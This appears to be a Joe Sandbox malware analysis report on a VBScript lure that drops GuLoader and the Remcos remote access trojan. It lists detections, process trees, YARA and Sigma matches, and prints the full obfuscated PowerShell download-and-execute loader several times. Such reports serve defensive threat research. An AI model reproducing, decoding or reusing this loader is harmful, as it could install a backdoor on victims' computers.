Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document BT24#U00b7pdf.vbs

Overview

General Information

Sample name:Document BT24#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:Document BT24pdf.vbs
Analysis ID:1634191
MD5:ad3e6aca2d3c7bdc121064d393074f8b
SHA1:8dca38f1576b98c17435bc1dd37ebf62108e77a8
SHA256:7bec21f0990dfc51766f7b7932aa1535aa0414e33abc021834158151ad15ed9d
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6420 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 5300 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill Hipe ammnGuldsYrt . ilsH weeReacaKvardExoreInddr acosUd n[Syda$fjerGPersyelsalSe edSponiGr ngKorth egneVided nsee uldrBest] Una=over$Top CLambhBogsoChorr MireAilumDa aeSpekn');$Karaffelen=raspite 'gene$CyklKDatanHumoipr.spUrcel ConiBearn Se.gTv,nsReprkS iajForkoSko,lTe teTempnKvarstids.SlagDStimoOli wSkran ontlOligoArtiaU,gedIntwF TariSupel Fa eObs (Shel$XiphRU reeTil,aD bocDdnic LivebutnpHimmt DiveUnhod R.v, Kal$.aleM DiteTranrcre kgrunaNonbn BantTrani TrilSa eiForbsB lle GatrEx eiTrann ShagombyePopurBygms mph)';$Merkantiliseringers=$Growled96;Xanthorrhiza (raspite 'Opp,$FinaGHi,llcrawO TriB h saBiblLtri :gra rChikikrantHef,UKat,aGrinl.estI f isfearETestrobe e P.c=Gr e(Pil.TPr dE .pfs soctisod-CadepBoykASievtPsych Pro Vibr$O,maMSympe PlaRUns k I tA Co N AuktNon.iKaprlT.rnIStenScockeEkspRPos,i .itnParkgbad eOnobRPl tsHjre)');while (!$Ritualisere) {Xanthorrhiza (raspite ' Ta $Resig MaclS.rfo.lotbAppraNrdelKnu,: epoKBlijaBlenrPoacaAuthvLandaOch nNardeart rDeth=Etym$flatHP.rtu PanmHaggaG nsnHr cicirko storU.dea') ;Xanthorrhiza $Karaffelen;Xanthorrhiza (raspite 'Effe[bralTErhvH RidrCoene Ga.aprecd PerIA ernGemiG Dum. drTVerdh OutRBevaeSystAPublDPhth]Timo:Cha : AdosSymjLUnvoEUddee ngPTili(Udfo4Bo.c0.est0Anti0Halv)');Xanthorrhiza (raspite ' U d$ esgBri.L EleOLunhB T,oAHaleLD ab:As eRSubciForbTFjeluElb.AUnliLConvIforbS G,nefor.rRo,ee,ran=Inte(Hot,tPeneELaans Alktlupa- romPK meAGenkTPolyhP um Rade$MaddmBadeEProsrHa pkD apaslagNPeratsiveIBal.lyaw IUngpsUdsgeSoutr inei irkn GasgMellESa mRFugtscomm)') ;Xanthorrhiza (raspite 'Samm$ DrvGN ctlH aloScioBCasta verLRibo:FordlTrisYS.reSBumsaCo vA AfkRL njeScatN.yheeLind=Indp$N,rmgYam lEm lOBedrbP,icAFor,LTy.i:Tan EArtirBrasSR prtLastA Ur TCoupn MeniPopunCacaGFr.nSTottVH lvA nadNvirgdCynoEDeset NonS oru+Borg+Run.% Sej$MyceE nterCaumyRun,tSo,rhShasRSemioCoueC BoryFullT tapESlagSWe,d.SleeCSn roCompUResan arnT') ;$Reaccepted=$Erythrocytes[$Lysaarene]}$Svingfjer=356763;$Gastroenterocolostomy=30418;Xanthorrhiza (raspite 'triu$ApotGFootLFlyvOSiftbUnthaTykmLCate:AcoebAer OHulvB DefEOpkosRobet H py etrRTvanefje RAr enForaeTe tsKali penu= Iri TrangVel eAmalTAlth- RhuCS.ooOph enethnt orseBillNReleTCa a Ps u$CampmUnnaEDe,irDisakSacraFinaNTintTF eri,nopLkrani remSHeavEcoilrDetaiPredn.olkGFor ETts.RDkvas');Xanthorrhiza (raspite 'Tran$T.legDek lGodkoJymobBondaT pal Skr:StemUBor nRetspK llrgaa o UtavB,rbeFrerrdemobDenaiInteaMandlCo,tlOut yFjsi2Non 4Nonp Abra=Ca.a Lo,o[ BurSBestyPachs UdktFolkeKikkmT.sp.FileCSnowoKlatnRkesvTerteFo.orAfprt d m]Kart:unde: DamFSworrSupeoOpremS.riB Bu a HoesSie eBorg6Diss4Hym S tratungarBelliAl entragg yvi(Arbe$BegrBF ntokopubIm,re Subs D,ltus nyHkker eleeDatarUnd.n ,kse alasK an)');Xanthorrhiza (raspite 'Pasn$AfprGCro l ingoMarkbWolfALongL Ml : U oScurtK CabEAmphPWofuTOps.iTrojkDysteFyl rHypeNTorpEDess Fors=Ophi Per[ Kurs G ay Tr.SDr.rT AudEIntrmRati.HammTOv rEPantXKnhaT re.Ato.E ResNSelec Va,oSkemD I li Pern.estGNedf]P as:Unep:KanaaUmensForsCD.sqiCoffiefte.C nvG F,rE oenTProts kedtContrKnsrICen N tarGSpad(Sulp$S laU I dnUnd pRe,erEag o,erkVMilleGrdaRDinnBPaasiLannA SceLProsLB.gbY eun2Tank4Disk)');Xanthorrhiza (raspite ' Ban$overGMassLKrydoOverbTentaFil LHo.e:CaecaCampNSammAVikaRKoldIDestTUds H tedICentALune=Vivi$genssForsk Lare GylpEtnoTAl mIMausK,ulkeSuper ejnDespEHol .LedvsArgyU fa.bCoe.SKeysTAntiRvelmIN nfn runG ede( Jig$Thu sHamaVNontIFr bnforhGT.arfBan JToole SmerEury,Bet $D.vig uezabeshs ettt,iderHi toSterE D unCairT TvieDiodrUdvaoHeteC ForoKontL Ta.OBoykS enTFodrO GulM P eYPast)');Xanthorrhiza $anarithia;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2112 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill Hipe ammnGuldsYrt . ilsH weeReacaKvardExoreInddr acosUd n[Syda$fjerGPersyelsalSe edSponiGr ngKorth egneVided nsee uldrBest] Una=over$Top CLambhBogsoChorr MireAilumDa aeSpekn');$Karaffelen=raspite 'gene$CyklKDatanHumoipr.spUrcel ConiBearn Se.gTv,nsReprkS iajForkoSko,lTe teTempnKvarstids.SlagDStimoOli wSkran ontlOligoArtiaU,gedIntwF TariSupel Fa eObs (Shel$XiphRU reeTil,aD bocDdnic LivebutnpHimmt DiveUnhod R.v, Kal$.aleM DiteTranrcre kgrunaNonbn BantTrani TrilSa eiForbsB lle GatrEx eiTrann ShagombyePopurBygms mph)';$Merkantiliseringers=$Growled96;Xanthorrhiza (raspite 'Opp,$FinaGHi,llcrawO TriB h saBiblLtri :gra rChikikrantHef,UKat,aGrinl.estI f isfearETestrobe e P.c=Gr e(Pil.TPr dE .pfs soctisod-CadepBoykASievtPsych Pro Vibr$O,maMSympe PlaRUns k I tA Co N AuktNon.iKaprlT.rnIStenScockeEkspRPos,i .itnParkgbad eOnobRPl tsHjre)');while (!$Ritualisere) {Xanthorrhiza (raspite ' Ta $Resig MaclS.rfo.lotbAppraNrdelKnu,: epoKBlijaBlenrPoacaAuthvLandaOch nNardeart rDeth=Etym$flatHP.rtu PanmHaggaG nsnHr cicirko storU.dea') ;Xanthorrhiza $Karaffelen;Xanthorrhiza (raspite 'Effe[bralTErhvH RidrCoene Ga.aprecd PerIA ernGemiG Dum. drTVerdh OutRBevaeSystAPublDPhth]Timo:Cha : AdosSymjLUnvoEUddee ngPTili(Udfo4Bo.c0.est0Anti0Halv)');Xanthorrhiza (raspite ' U d$ esgBri.L EleOLunhB T,oAHaleLD ab:As eRSubciForbTFjeluElb.AUnliLConvIforbS G,nefor.rRo,ee,ran=Inte(Hot,tPeneELaans Alktlupa- romPK meAGenkTPolyhP um Rade$MaddmBadeEProsrHa pkD apaslagNPeratsiveIBal.lyaw IUngpsUdsgeSoutr inei irkn GasgMellESa mRFugtscomm)') ;Xanthorrhiza (raspite 'Samm$ DrvGN ctlH aloScioBCasta verLRibo:FordlTrisYS.reSBumsaCo vA AfkRL njeScatN.yheeLind=Indp$N,rmgYam lEm lOBedrbP,icAFor,LTy.i:Tan EArtirBrasSR prtLastA Ur TCoupn MeniPopunCacaGFr.nSTottVH lvA nadNvirgdCynoEDeset NonS oru+Borg+Run.% Sej$MyceE nterCaumyRun,tSo,rhShasRSemioCoueC BoryFullT tapESlagSWe,d.SleeCSn roCompUResan arnT') ;$Reaccepted=$Erythrocytes[$Lysaarene]}$Svingfjer=356763;$Gastroenterocolostomy=30418;Xanthorrhiza (raspite 'triu$ApotGFootLFlyvOSiftbUnthaTykmLCate:AcoebAer OHulvB DefEOpkosRobet H py etrRTvanefje RAr enForaeTe tsKali penu= Iri TrangVel eAmalTAlth- RhuCS.ooOph enethnt orseBillNReleTCa a Ps u$CampmUnnaEDe,irDisakSacraFinaNTintTF eri,nopLkrani remSHeavEcoilrDetaiPredn.olkGFor ETts.RDkvas');Xanthorrhiza (raspite 'Tran$T.legDek lGodkoJymobBondaT pal Skr:StemUBor nRetspK llrgaa o UtavB,rbeFrerrdemobDenaiInteaMandlCo,tlOut yFjsi2Non 4Nonp Abra=Ca.a Lo,o[ BurSBestyPachs UdktFolkeKikkmT.sp.FileCSnowoKlatnRkesvTerteFo.orAfprt d m]Kart:unde: DamFSworrSupeoOpremS.riB Bu a HoesSie eBorg6Diss4Hym S tratungarBelliAl entragg yvi(Arbe$BegrBF ntokopubIm,re Subs D,ltus nyHkker eleeDatarUnd.n ,kse alasK an)');Xanthorrhiza (raspite 'Pasn$AfprGCro l ingoMarkbWolfALongL Ml : U oScurtK CabEAmphPWofuTOps.iTrojkDysteFyl rHypeNTorpEDess Fors=Ophi Per[ Kurs G ay Tr.SDr.rT AudEIntrmRati.HammTOv rEPantXKnhaT re.Ato.E ResNSelec Va,oSkemD I li Pern.estGNedf]P as:Unep:KanaaUmensForsCD.sqiCoffiefte.C nvG F,rE oenTProts kedtContrKnsrICen N tarGSpad(Sulp$S laU I dnUnd pRe,erEag o,erkVMilleGrdaRDinnBPaasiLannA SceLProsLB.gbY eun2Tank4Disk)');Xanthorrhiza (raspite ' Ban$overGMassLKrydoOverbTentaFil LHo.e:CaecaCampNSammAVikaRKoldIDestTUds H tedICentALune=Vivi$genssForsk Lare GylpEtnoTAl mIMausK,ulkeSuper ejnDespEHol .LedvsArgyU fa.bCoe.SKeysTAntiRvelmIN nfn runG ede( Jig$Thu sHamaVNontIFr bnforhGT.arfBan JToole SmerEury,Bet $D.vig uezabeshs ettt,iderHi toSterE D unCairT TvieDiodrUdvaoHeteC ForoKontL Ta.OBoykS enTFodrO GulM P eYPast)');Xanthorrhiza $anarithia;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4752 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6172 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000003.00000002.1582725505.0000026D10302000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000008.00000002.2006537244.0000000008750000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000008.00000002.1971298491.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000008.00000002.2006894025.000000000B775000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7624.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7624.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfe95:$b2: ::FromBase64String(
              • 0xd1cc:$s1: -join
              • 0x6978:$s4: +=
              • 0x6a3a:$s4: +=
              • 0xac61:$s4: +=
              • 0xcd7e:$s4: +=
              • 0xd068:$s4: +=
              • 0xd1ae:$s4: +=
              • 0xf56f:$s4: +=
              • 0xf5ef:$s4: +=
              • 0xf6b5:$s4: +=
              • 0xf735:$s4: +=
              • 0xf90b:$s4: +=
              • 0xf98f:$s4: +=
              • 0xd9f8:$e4: Get-WmiObject
              • 0xdbe7:$e4: Get-Process
              • 0xdc3f:$e4: Start-Process
              amsi32_2112.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa9fc:$b2: ::FromBase64String(
              • 0x9a64:$s1: -join
              • 0x3210:$s4: +=
              • 0x32d2:$s4: +=
              • 0x74f9:$s4: +=
              • 0x9616:$s4: +=
              • 0x9900:$s4: +=
              • 0x9a46:$s4: +=
              • 0x13a8a:$s4: +=
              • 0x13b0a:$s4: +=
              • 0x13bd0:$s4: +=
              • 0x13c50:$s4: +=
              • 0x13e26:$s4: +=
              • 0x13eaa:$s4: +=
              • 0xa290:$e4: Get-WmiObject
              • 0xa47f:$e4: Get-Process
              • 0xa4d7:$e4: Start-Process
              • 0x14712:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", ProcessId: 6420, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4752, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49716
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", ProcessId: 6420, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag 